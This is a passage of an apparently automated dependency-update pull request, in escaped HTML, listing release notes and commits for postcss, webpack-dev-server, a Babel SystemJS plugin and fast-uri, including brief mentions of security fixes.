AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/33b9790263dc1562a46ce45d9532bd63e95b7986\"\u003e\u003ccode\u003e33b9790\u003c/code\u003e\u003c/a\u003e Release 8.5.10 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/536c79e4b01e58a3a56b09c3c0cf2323f4b9a28b\"\u003e\u003ccode\u003e536c79e\u003c/code\u003e\u003c/a\u003e Escape \u0026lt;/style\u0026gt; in CSS output (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/afa96b2a139ce625c4d27973313479c7c85f39d4\"\u003e\u003ccode\u003eafa96b2\u003c/code\u003e\u003c/a\u003e Update dependencies (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2073\"\u003e#2073\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/effe88bb87cabdc1876e02adbdd30f392f19f40d\"\u003e\u003ccode\u003eeffe88b\u003c/code\u003e\u003c/a\u003e Typo (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2072\"\u003e#2072\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/3ee79a2c4a11e41d52db50b444eebe38299495ad\"\u003e\u003ccode\u003e3ee79a2\u003c/code\u003e\u003c/a\u003e Thread model (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2071\"\u003e#2071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/2e0683daca4dc2919211b03774f6b2d137136c01\"\u003e\u003ccode\u003e2e0683d\u003c/code\u003e\u003c/a\u003e Create incident response docs (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/fe88ac29c06b7b218be32994cdc6ca1525bdf2c9\"\u003e\u003ccode\u003efe88ac2\u003c/code\u003e\u003c/a\u003e Release 8.5.9 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/c551632496b87ab3f1965bfda5dc386b6c71963e\"\u003e\u003ccode\u003ec551632\u003c/code\u003e\u003c/a\u003e Avoid RegExp when we can use simple JS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/89a6b744060eb8dee743351c785a9fbe37d4525a\"\u003e\u003ccode\u003e89a6b74\u003c/code\u003e\u003c/a\u003e Move SECURITY.txt for docs folder to keep GitHub page cleaner\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/6ceb8a46af9f9de821faee98f861bdf84617347b\"\u003e\u003ccode\u003e6ceb8a4\u003c/code\u003e\u003c/a\u003e Create SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.5.6...8.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.29.0 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-uri` from 3.1.0 to 3.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastify/fast-uri/releases\"\u003efast-uri's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.2\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed fragment decoding as a parse error by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/171\"\u003efastify/fast-uri#171\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.1\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.32.0 to 0.33.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/148\"\u003efastify/fast-uri#148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/149\"\u003efastify/fast-uri#149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(.npmrc): ignore scripts by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/150\"\u003efastify/fast-uri#150\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): remove \u003ccode\u003e@​fastify/pre-commit\u003c/code\u003e by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/151\"\u003efastify/fast-uri#151\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/152\"\u003efastify/fast-uri#152\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): add concurrency config by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/153\"\u003efastify/fast-uri#153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/154\"\u003efastify/fast-uri#154\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/156\"\u003efastify/fast-uri#156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(license): standardise license notice by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/159\"\u003efastify/fast-uri#159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003estyle: remove trailing whitespace by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/161\"\u003efastify/fast-uri#161\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: remove unused github files by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update readme by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/164\"\u003efastify/fast-uri#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-manager.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/165\"\u003efastify/fast-uri#165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/166\"\u003efastify/fast-uri#166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump neostandard from 0.12.2 to 0.13.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/167\"\u003efastify/fast-uri#167\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add lock-threads workflow by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/169\"\u003efastify/fast-uri#169\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca 